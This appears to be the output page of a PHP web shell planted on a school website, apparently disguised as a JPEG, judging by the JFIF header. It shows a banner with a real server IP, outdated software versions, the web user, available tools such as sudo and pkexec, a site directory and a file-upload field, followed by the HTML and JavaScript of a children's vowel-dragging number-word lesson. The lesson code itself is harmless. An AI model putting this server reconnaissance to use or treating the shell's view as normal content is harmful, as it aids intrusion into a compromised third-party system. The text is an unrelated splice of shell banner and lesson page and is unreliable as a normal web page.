????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.141.33.133 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old4/Html/LevelA/Category2/ |
Upload File : |
<!doctype html> <html> <head> <title>Drag the number names of vowels 'a, e, i, o, u'</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <script> function page_preLoad() { shared_setDeviceTypeLevelCategoryLastLesson(Level.A, Category.No2); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.A, Category.No2, 15), true, true); shared_setFooterTable('id_tblFooter', true, true, false, true, true); var ids_boxes = ['id_TdSpanLetterO1Box', 'id_TdSpanLetterO2Box', 'id_TdSpanLetterE1Box', 'id_TdSpanLetterE2Box', 'id_TdSpanLetterO3Box', 'id_TdSpanLetterU1Box', 'id_TdSpanLetterI1Box', 'id_TdSpanLetterE3Box', 'id_TdSpanLetterI2Box', 'id_TdSpanLetterE4Box', 'id_TdSpanLetterE5Box', 'id_TdSpanLetterE6Box', 'id_TdSpanLetterI3Box', 'id_TdSpanLetterI4Box', 'id_TdSpanLetterE7Box', 'id_TdSpanLetterE8Box']; var ids_headings = ['id_td_heading1', 'id_td_heading2']; var ids_options = ['id_SpanLetterA1', 'id_SpanLetterO1', 'id_SpanLetterO2', 'id_SpanLetterO3','id_SpanLetterI1', 'id_SpanLetterI2', 'id_SpanLetterI3', 'id_SpanLetterI4', 'id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8', 'id_SpanLetterU1']; var ids_texts = ['id_td_text1', 'id_td_text2', 'id_td_text3', 'id_td_text4', 'id_td_text5', 'id_td_text6', 'id_td_text7', 'id_td_text8', 'id_td_text9', 'id_td_text10', 'id_td_text11', 'id_td_text12', 'id_td_text13', 'id_td_text14', 'id_td_text15', 'id_td_text16', 'id_td_text17', 'id_td_text18', 'id_td_text19', 'id_td_text20', 'id_td_text21', 'id_td_text22', 'id_td_text23', 'id_td_text24', 'id_td_text25', 'id_td_text26', 'id_td_text27', 'id_td_text28', 'id_td_text29']; var ids_All = ids_headings.concat(ids_boxes, ids_texts); shared_adjust_fontSize_for_ids_all_devices(ids_All, 80); shared_adjust_fontSize_for_ids_all_devices(ids_options, 90); shared_init_dropBox_tds_withOUT_drag_here(ids_boxes); shared_init_dropping_spans(ids_options); shared_hideAllExceptFirstElement('id_SpanLetterO', 3); shared_hideAllExceptFirstElement('id_SpanLetterI', 4); shared_hideAllExceptFirstElement('id_SpanLetterE', 8); shared_set_all_draggble_to_false_except_first_element('id_td_O', 3); shared_set_all_draggble_to_false_except_first_element('id_td_I', 4); shared_set_all_draggble_to_false_except_first_element('id_td_E', 8); } function page_onLoad() { } function btnPrevious_click() { window.location = "LevelACat2Lesson14.html"; } function btnNext_click() { window.location = "LevelACat2Lesson16.html"; } function btnHome_click() { shared_btnHomeCategories_click('LevelA'); } function btnLevel_click(levelName) { var urlString = "Lessons.html?" + levelName; var urlEncoded = encodeURI(urlString); window.location = urlEncoded; } function DragDrop(id_dropBox, text, ids_array) { if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array)) { shared_setTextAndBackgroundColorToGreenAndIsMovedTrue(shared_currentDropingId, id_dropBox); if (text == 'I') { showNextILetter(); } else if (text == 'O') { showNextOLetter(); } else if (text == 'E') { showNextELetter(); } isAllInfosMovedShowClapsAnimation(); shared_set_currentDropingId_draggbleToFalse(); } else { shared_resetCurrentDroppingPosition(id_dropBox); } } function showNextILetter() { shared_unHideNextElementNew('id_SpanLetterI', 4); isAllInfosMovedShowClapsAnimation(); } function showNextOLetter() { shared_unHideNextElementNew('id_SpanLetterO', 3); isAllInfosMovedShowClapsAnimation(); } function showNextELetter() { shared_unHideNextElementNew('id_SpanLetterE', 8); isAllInfosMovedShowClapsAnimation(); } function isAllInfosMovedShowClapsAnimation() { var ids_boxes = ['id_TdSpanLetterO1Box', 'id_TdSpanLetterO2Box', 'id_TdSpanLetterE1Box', 'id_TdSpanLetterE2Box', 'id_TdSpanLetterO3Box', 'id_TdSpanLetterU1Box', 'id_TdSpanLetterI1Box', 'id_TdSpanLetterE3Box', 'id_TdSpanLetterI2Box', 'id_TdSpanLetterE4Box', 'id_TdSpanLetterE5Box', 'id_TdSpanLetterE6Box', 'id_TdSpanLetterI3Box', 'id_TdSpanLetterI4Box', 'id_TdSpanLetterE7Box', 'id_TdSpanLetterE8Box']; shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes); } </script> </head> <body onload="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0"> <tr height="8%"> <td> <div id="id_tblHeader"></div> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="5%"> <td class="style_borderNone"> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="2%" style="border-left: none; border-right: none; border-top: none"> <tr> <td id="id_td_heading1" width="100%" class="shared_style_options_black_24px_bold" style="border: none"> <u>Fill the blanks by dragging the vowels. </u><span style="color: red"><u>a, e, i, o, u</u></span> </td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%"> <tr height="100%"> <td> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-collapse: collapse"> <tr height="12%"> <td style="border-bottom:none"> <table id="id_tblOptionsSet3" border="0" width="100%" height="100%" cellspacing="0" cellpadding="0"> <tr height="50%"> <td id="id_td_heading2" width="*" class="shared_style_options_blue_24px_bold">Options:</td> <td id="id_td_O3" align="center" width="9%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterO3" class="shared_style_red_24px_bold">o</span></td> <td id="id_td_E1" align="center" width="9%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterE1" class="shared_style_red_24px_bold">e</span></td> <td id="id_td_I3" align="center" width="9%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterI3" class="shared_style_red_24px_bold">i</span></td> <td id="id_td_O1" align="center" width="9%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterO1" class="shared_style_red_24px_bold">o</span></td> <td id="id_td_E5" align="center" width="10%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterE5" class="shared_style_red_24px_bold">e</span></td> <td id="id_td_U1" align="center" width="10%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterU1" class="shared_style_red_24px_bold">u</span></td> <td id="id_td_O2" align="center" width="10%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterO2" class="shared_style_red_24px_bold">o</span></td> <td id="id_td_E2" align="center" width="10%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterE2" class="shared_style_red_24px_bold">e</span></td> <td id="id_td_I2" align="center" width="10%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterI2" class="shared_style_red_24px_bold">i</span></td> </tr> <tr height="*"> <td width="*"> </td> <td id="id_td_E3" align="center" width="9%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterE3" class="shared_style_red_24px_bold">e</span></td> <td id="id_td_A1" align="center" width="9%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterA1" class="shared_style_red_24px_bold">a</span></td> <td id="id_td_E4" align="center" width="9%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterE4" class="shared_style_red_24px_bold">e</span></td> <td id="id_td_I1" align="center" width="9%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterI1" class="shared_style_red_24px_bold">i</span></td> <td id="id_td_I4" align="center" width="10%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterI4" class="shared_style_red_24px_bold">i</span></td> <td id="id_td_E6" align="center" width="10%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterE6" class="shared_style_red_24px_bold">e</span></td> <td id="id_td_E7" align="center" width="10%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterE7" class="shared_style_red_24px_bold">e</span></td> <td id="id_td_E8" align="center" width="10%" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanLetterE8" class="shared_style_red_24px_bold">e</span></td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border = "0" cellspacing="1" cellpadding="0"> <tr height="10%" ondragover="shared_highlight('id_TdSpanLetterO1Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterO1Box')" ondrop="DragDrop('id_TdSpanLetterO1Box', 'O', ['id_SpanLetterO1', 'id_SpanLetterO2', 'id_SpanLetterO3'])"> <td width = "100%"> <table class="style_table_padding" width="100%" height="100%" border = "0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td_text1" width = "50%" class="shared_style_black_24px_bold" align="center">1</td> <td id="id_TdSpanLetterO1Box" width="5%" class="shared_style_red_24px_bold" align="center">__</td> <td id="id_td_text2"width = "5%" class="shared_style_black_24px_bold">ne</td> <td width="*"> </td> </tr> </table> </td> </tr> <tr height="10%" ondragover="shared_highlight('id_TdSpanLetterO2Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterO2Box')" ondrop="DragDrop('id_TdSpanLetterO2Box', 'O', ['id_SpanLetterO1', 'id_SpanLetterO2', 'id_SpanLetterO3'])"> <td width = "100%"> <table class="style_table_padding" width="100%" height="100%" border = "0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td_text3" width = "50%" class="shared_style_black_24px_bold" align="center">2</td> <td id="id_td_text4" width = "5%" class="shared_style_black_24px_bold">tw</td> <td id="id_TdSpanLetterO2Box" width="5%" class="shared_style_red_24px_bold" align="center">__</td> <td width="*"> </td> </tr> </table> </td> </tr> <tr height="10%"> <td width = "100%"> <table class="style_table_padding" width="100%" height="100%" border = "0" cellspacing="1" cellpadding="0"> <tr > <td id="id_td_text5" width = "50%" class="shared_style_black_24px_bold" align="center">3</td> <td id="id_td_text6" width = "5%" class="shared_style_black_24px_bold" >thr</td> <td id="id_TdSpanLetterE1Box" width="5%" class="shared_style_red_24px_bold" align="center" ondragover="shared_highlight('id_TdSpanLetterE1Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterE1Box')" ondrop="DragDrop('id_TdSpanLetterE1Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])">__</td> <td id="id_TdSpanLetterE2Box" width="5%" class="shared_style_red_24px_bold" align="center" ondragover="shared_highlight('id_TdSpanLetterE2Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterE2Box')" ondrop="DragDrop('id_TdSpanLetterE2Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])">__</td> <td width="*"> </td> </tr> </table> </td> </tr> <tr height="10%"> <td width = "100%"> <table class="style_table_padding" width="100%" height="100%" border = "0" cellspacing="1" cellpadding="0"> <tr> <td id="id_td_text7" width = "50%" class="shared_style_black_24px_bold" align="center">4</td> <td id="id_td_text8" width = "2%" class="shared_style_black_24px_bold">f</td> <td id="id_TdSpanLetterO3Box" width="5%" class="shared_style_red_24px_bold" align="center" ondragover="shared_highlight('id_TdSpanLetterO3Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterO3Box')" ondrop="DragDrop('id_TdSpanLetterO3Box', 'O', ['id_SpanLetterO1', 'id_SpanLetterO2', 'id_SpanLetterO3'])">__</td> <td id="id_TdSpanLetterU1Box" width="5%" class="shared_style_red_24px_bold cls_TdSpanLetterU1Box" align="center" ondragover="shared_highlight('id_TdSpanLetterU1Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterU1Box')" ondrop="DragDrop('id_TdSpanLetterU1Box', 'U', ['id_SpanLetterU1'])">__</td> <td id="id_td_text9" width = "2%" class="shared_style_black_24px_bold">r</td> <td width="*"> </td> </tr> </table> </td> </tr> <tr height="10%"> <td width = "100%"> <table class="style_table_padding" width="100%" height="100%" border = "0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td_text10" width = "50%" class="shared_style_black_24px_bold" align="center">5</td> <td id="id_td_text11" width = "2%" class="shared_style_black_24px_bold">f</td> <td id="id_TdSpanLetterI1Box" width="5%" class="shared_style_red_24px_bold" align="center" ondragover="shared_highlight('id_TdSpanLetterI1Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterI1Box')" ondrop="DragDrop('id_TdSpanLetterI1Box', 'I', ['id_SpanLetterI1', 'id_SpanLetterI2', 'id_SpanLetterI3', 'id_SpanLetterI4'])">__</td> <td id="id_td_text12" width = "2%" class="shared_style_black_24px_bold">v</td> <td id="id_TdSpanLetterE3Box" width="5%" class="shared_style_red_24px_bold" align="center" ondragover="shared_highlight('id_TdSpanLetterE3Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterE3Box')" ondrop="DragDrop('id_TdSpanLetterE3Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])">__</td> <td width="*"> </td> </tr> </table> </td> </tr> <tr height="10%" ondragover="shared_highlight('id_TdSpanLetterI2Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterI2Box')" ondrop="DragDrop('id_TdSpanLetterI2Box', 'I', ['id_SpanLetterI1', 'id_SpanLetterI2', 'id_SpanLetterI3', 'id_SpanLetterI4'])"> <td width = "100%"> <table class="style_table_padding" width="100%" height="100%" border = "0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td_text13" width = "50%" class="shared_style_black_24px_bold" align="center">6</td> <td id="id_td_text14" width = "2%" class="shared_style_black_24px_bold">s</td> <td id="id_TdSpanLetterI2Box" width="5%" class="shared_style_red_24px_bold" align="center">__</td> <td id="id_td_text15" width = "2%" class="shared_style_black_24px_bold">x</td> <td width="*"> </td> </tr> </table> </td> </tr> <tr height="10%"> <td width = "100%"> <table class="style_table_padding" width="100%" height="100%" border = "0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td_text16" width = "50%" class="shared_style_black_24px_bold" align="center">7</td> <td id="id_td_text17" width = "2%" class="shared_style_black_24px_bold">s</td> <td id="id_TdSpanLetterE4Box" width="5%" class="shared_style_red_24px_bold" align="center" ondragover="shared_highlight('id_TdSpanLetterE4Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterE4Box')" ondrop="DragDrop('id_TdSpanLetterE4Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])">__</td> <td id="id_td_text18" width = "2%" class="shared_style_black_24px_bold">v</td> <td id="id_TdSpanLetterE5Box" width="5%" class="shared_style_red_24px_bold" align="center" ondragover="shared_highlight('id_TdSpanLetterE5Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterE5Box')" ondrop="DragDrop('id_TdSpanLetterE5Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])">__</td> <td id="id_td_text19" width = "2%" class="shared_style_black_24px_bold">n</td> <td width="*"> </td> </tr> </table> </td> </tr> <tr height="10%"> <td width = "100%"> <table class="style_table_padding" width="100%" height="100%" border = "0" cellspacing="1" cellpadding="0"> <tr> <td id="id_td_text20" width = "50%" class="shared_style_black_24px_bold" align="center">8</td> <td id="id_TdSpanLetterE6Box" width="5%" class="shared_style_red_24px_bold" align="center" ondragover="shared_highlight('id_TdSpanLetterE6Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterE6Box')" ondrop="DragDrop('id_TdSpanLetterE6Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])">__</td> <td id="id_TdSpanLetterI3Box" width="5%" class="shared_style_red_24px_bold" align="center" ondragover="shared_highlight('id_TdSpanLetterI3Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterI3Box')" ondrop="DragDrop('id_TdSpanLetterI3Box', 'I', ['id_SpanLetterI1', 'id_SpanLetterI2', 'id_SpanLetterI3', 'id_SpanLetterI4'])">__</td> <td id="id_td_text21" width = "2%" class="shared_style_black_24px_bold">g</td> <td id="id_td_text22" width = "2%" class="shared_style_black_24px_bold">h</td> <td id="id_td_text23" width = "2%" class="shared_style_black_24px_bold">t</td> <td width="*"> </td> </tr> </table> </td> </tr> <tr height="10%"> <td width = "100%"> <table class="style_table_padding" width="100%" height="100%" border = "0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td_text24" width = "50%" class="shared_style_black_24px_bold" align="center">9</td> <td id="id_td_text25" width = "2%" class="shared_style_black_24px_bold">n</td> <td id="id_TdSpanLetterI4Box" width="5%" class="shared_style_red_24px_bold" align="center" ondragover="shared_highlight('id_TdSpanLetterI4Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterI4Box')" ondrop="DragDrop('id_TdSpanLetterI4Box', 'I', ['id_SpanLetterI1', 'id_SpanLetterI2', 'id_SpanLetterI3', 'id_SpanLetterI4'])">__</td> <td id="id_td_text26" width = "2%" class="shared_style_black_24px_bold">n</td> <td id="id_TdSpanLetterE7Box" width="5%" class="shared_style_red_24px_bold" align="center" ondragover="shared_highlight('id_TdSpanLetterE7Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterE7Box')" ondrop="DragDrop('id_TdSpanLetterE7Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])">__</td> <td width="*"> </td> </tr> </table> </td> </tr> <tr height="*" ondragover="shared_highlight('id_TdSpanLetterE8Box'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_TdSpanLetterE8Box')" ondrop="DragDrop('id_TdSpanLetterE8Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])"> <td width = "100%"> <table class="style_table_padding" width="100%" height="100%" border = "0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td_text27" width = "50%" class="shared_style_black_24px_bold" align="center">10</td> <td id="id_td_text28" width = "2%" class="shared_style_black_24px_bold">t</td> <td id="id_TdSpanLetterE8Box" width="5%" class="shared_style_red_24px_bold" align="center">__</td> <td id="id_td_text29" width = "2%" class="shared_style_black_24px_bold">n</td> <td width="*"> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="8%"> <td> <div id="id_tblFooter"></div> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_SpanLetterA1', {handle : 'id_td_A1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterE1', {handle : 'id_td_E1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterE2', {handle : 'id_td_E2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterE3', {handle : 'id_td_E3', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterE4', {handle : 'id_td_E4', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterE5', {handle : 'id_td_E5', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterE6', {handle : 'id_td_E6', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterE7', {handle : 'id_td_E7', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterE8', {handle : 'id_td_E8', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterI1', {handle : 'id_td_I1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterI2', {handle : 'id_td_I2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterI3', {handle : 'id_td_I3', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterI4', {handle : 'id_td_I4', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterO1', {handle : 'id_td_O1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterO2', {handle : 'id_td_O2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterO3', {handle : 'id_td_O3', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanLetterU1', {handle : 'id_td_U1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); webkit_drop.add('id_TdSpanLetterO1Box', {onOver : function(){shared_highlight('id_TdSpanLetterO1Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterO1Box')}, onDrop : function(){DragDrop('id_TdSpanLetterO1Box', 'O', ['id_SpanLetterO1', 'id_SpanLetterO2', 'id_SpanLetterO3'])}}); webkit_drop.add('id_TdSpanLetterO2Box', {onOver : function(){shared_highlight('id_TdSpanLetterO2Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterO2Box')}, onDrop : function(){DragDrop('id_TdSpanLetterO2Box', 'O', ['id_SpanLetterO1', 'id_SpanLetterO2', 'id_SpanLetterO3'])}}); webkit_drop.add('id_TdSpanLetterO3Box', {onOver : function(){shared_highlight('id_TdSpanLetterO3Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterO3Box')}, onDrop : function(){DragDrop('id_TdSpanLetterO3Box', 'O', ['id_SpanLetterO1', 'id_SpanLetterO2', 'id_SpanLetterO3'])}}); webkit_drop.add('id_TdSpanLetterI1Box', {onOver : function(){shared_highlight('id_TdSpanLetterI1Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterI1Box')}, onDrop : function(){DragDrop('id_TdSpanLetterI1Box', 'I', ['id_SpanLetterI1', 'id_SpanLetterI2', 'id_SpanLetterI3', 'id_SpanLetterI4'])}}); webkit_drop.add('id_TdSpanLetterI2Box', {onOver : function(){shared_highlight('id_TdSpanLetterI2Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterI2Box')}, onDrop : function(){DragDrop('id_TdSpanLetterI2Box', 'I', ['id_SpanLetterI1', 'id_SpanLetterI2', 'id_SpanLetterI3', 'id_SpanLetterI4'])}}); webkit_drop.add('id_TdSpanLetterI3Box', {onOver : function(){shared_highlight('id_TdSpanLetterI3Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterI3Box')}, onDrop : function(){DragDrop('id_TdSpanLetterI3Box', 'I', ['id_SpanLetterI1', 'id_SpanLetterI2', 'id_SpanLetterI3', 'id_SpanLetterI4'])}}); webkit_drop.add('id_TdSpanLetterI4Box', {onOver : function(){shared_highlight('id_TdSpanLetterI4Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterI4Box')}, onDrop : function(){DragDrop('id_TdSpanLetterI4Box', 'I', ['id_SpanLetterI1', 'id_SpanLetterI2', 'id_SpanLetterI3', 'id_SpanLetterI4'])}}); webkit_drop.add('id_TdSpanLetterE1Box', {onOver : function(){shared_highlight('id_TdSpanLetterE1Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterE1Box')}, onDrop : function(){DragDrop('id_TdSpanLetterE1Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])}}); webkit_drop.add('id_TdSpanLetterE2Box', {onOver : function(){shared_highlight('id_TdSpanLetterE2Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterE2Box')}, onDrop : function(){DragDrop('id_TdSpanLetterE2Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])}}); webkit_drop.add('id_TdSpanLetterE3Box', {onOver : function(){shared_highlight('id_TdSpanLetterE3Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterE3Box')}, onDrop : function(){DragDrop('id_TdSpanLetterE3Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])}}); webkit_drop.add('id_TdSpanLetterE4Box', {onOver : function(){shared_highlight('id_TdSpanLetterE4Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterE4Box')}, onDrop : function(){DragDrop('id_TdSpanLetterE4Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])}}); webkit_drop.add('id_TdSpanLetterE5Box', {onOver : function(){shared_highlight('id_TdSpanLetterE5Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterE5Box')}, onDrop : function(){DragDrop('id_TdSpanLetterE5Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])}}); webkit_drop.add('id_TdSpanLetterE6Box', {onOver : function(){shared_highlight('id_TdSpanLetterE6Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterE6Box')}, onDrop : function(){DragDrop('id_TdSpanLetterE6Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])}}); webkit_drop.add('id_TdSpanLetterE7Box', {onOver : function(){shared_highlight('id_TdSpanLetterE7Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterE7Box')}, onDrop : function(){DragDrop('id_TdSpanLetterE7Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])}}); webkit_drop.add('id_TdSpanLetterE8Box', {onOver : function(){shared_highlight('id_TdSpanLetterE8Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterE8Box')}, onDrop : function(){DragDrop('id_TdSpanLetterE8Box', 'E', ['id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8'])}}); webkit_drop.add('id_TdSpanLetterU1Box', {onOver : function(){shared_highlight('id_TdSpanLetterU1Box')}, onOut : function(){shared_un_highlight('id_TdSpanLetterU1Box')}, onDrop : function(){DragDrop('id_TdSpanLetterU1Box', 'U', ['id_SpanLetterU1'])}}); </script> </body> </html>